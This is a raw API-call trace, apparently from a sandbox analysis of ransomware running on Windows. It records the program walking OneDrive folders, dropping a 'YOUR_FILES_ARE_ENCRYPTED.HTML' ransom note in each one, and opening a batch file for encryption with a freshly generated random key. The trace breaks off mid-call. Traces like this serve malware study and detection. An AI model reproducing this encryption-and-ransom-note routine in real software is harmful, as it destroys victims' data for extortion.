returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in\\*" [0160.299] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6ae6630, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c89550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6c89550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName=".", 
cAlternateFileName="")) returned 0x42f3280 [0160.301] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6ae6630, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c89550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6c89550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.301] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6c89550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c89550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6c89550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.301] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in\\FileSync.LocalizedResources.dll.mui") returned 113 [0160.301] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.301] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.301] lstrlenW (lpString=".mui") returned 4 [0160.301] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.301] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6c89550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c89550, 
ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6c89550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.301] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.301] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0160.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bn-in\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\bn-in\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.302] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.304] CloseHandle (hObject=0x5a8) returned 1 [0160.305] GetProcessHeap () returned 0x270000 [0160.306] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.306] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6c89550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e525d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e525d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="bs-latn-ba", 
cAlternateFileName="BS-LAT~1")) returned 1 [0160.306] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba") returned 82 [0160.306] GetProcessHeap () returned 0x270000 [0160.306] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.306] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba" [0160.306] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba\\*" [0160.306] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6c89550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e525d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e525d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.307] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6c89550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e525d0, 
ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e525d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.307] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6e525d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e525d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e525d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.307] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba\\FileSync.LocalizedResources.dll.mui") returned 118 [0160.307] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.307] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.307] lstrlenW (lpString=".mui") returned 4 [0160.307] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.307] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6e525d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e525d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e525d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.307] 
FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.307] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0160.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\bs-latn-ba\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\bs-latn-ba\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.308] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.310] CloseHandle (hObject=0x5a8) returned 1 [0160.311] GetProcessHeap () returned 0x270000 [0160.311] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.311] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6e525d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa708da70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa708da70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ca", cAlternateFileName="")) returned 1 [0160.311] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca") returned 74 [0160.311] GetProcessHeap () returned 0x270000 [0160.311] RtlAllocateHeap 
(HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.312] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca" [0160.312] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca\\*" [0160.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6e525d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa708da70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa708da70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.313] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6e525d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa708da70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa708da70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.313] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: 
lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa708da70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa708da70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa708da70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136a8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.313] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.313] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.313] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.313] lstrlenW (lpString=".mui") returned 4 [0160.313] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.313] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa708da70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa708da70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa708da70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136a8, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.313] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.313] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.313] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ca\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.314] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.316] CloseHandle (hObject=0x5a8) returned 1 [0160.317] GetProcessHeap () returned 0x270000 [0160.318] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.318] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa708da70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7550670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7550670, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ca-es-valencia", cAlternateFileName="CA-ES-~1")) returned 1 [0160.318] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia") returned 86 [0160.318] GetProcessHeap () returned 0x270000 [0160.318] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.318] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia" [0160.318] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia\\*" [0160.318] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa708da70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7550670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7550670, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.319] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa708da70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7550670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7550670, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.319] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7550670, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7550670, 
ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7550670, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136b0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.319] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia\\FileSync.LocalizedResources.dll.mui") returned 122 [0160.319] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.319] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.319] lstrlenW (lpString=".mui") returned 4 [0160.319] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.319] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7550670, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7550670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7550670, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136b0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.319] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.319] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0160.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 
"c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ca-es-valencia\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.320] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.322] CloseHandle (hObject=0x5a8) returned 1 [0160.323] GetProcessHeap () returned 0x270000 [0160.324] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.324] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3e90c70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3e90c70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3e90c70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x16d3, dwReserved0=0x0, dwReserved1=0x60, cFileName="CollectOneDriveLogs.bat", cAlternateFileName="COLLEC~1.BAT")) returned 1 [0160.324] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\CollectOneDriveLogs.bat") returned 95 [0160.324] lstrcmpW (lpString1="CollectOneDriveLogs.bat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.324] PathFindExtensionW (pszPath="CollectOneDriveLogs.bat") returned=".bat" [0160.324] lstrlenW (lpString=".bat") returned 4 [0160.324] PathFindExtensionW (pszPath="CollectOneDriveLogs.bat") returned=".bat" [0160.324] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.324] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\CollectOneDriveLogs.bat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\collectonedrivelogs.bat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0160.324] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=5843) returned 1 [0160.325] GetProcessHeap () returned 0x270000 [0160.325] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0160.328] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="B3") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="FF") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="49") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="84") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="F0") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="9C") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="1F") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="A3") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="0C") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="11") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="1C") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="32") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="D0") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="8D") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd14a, 
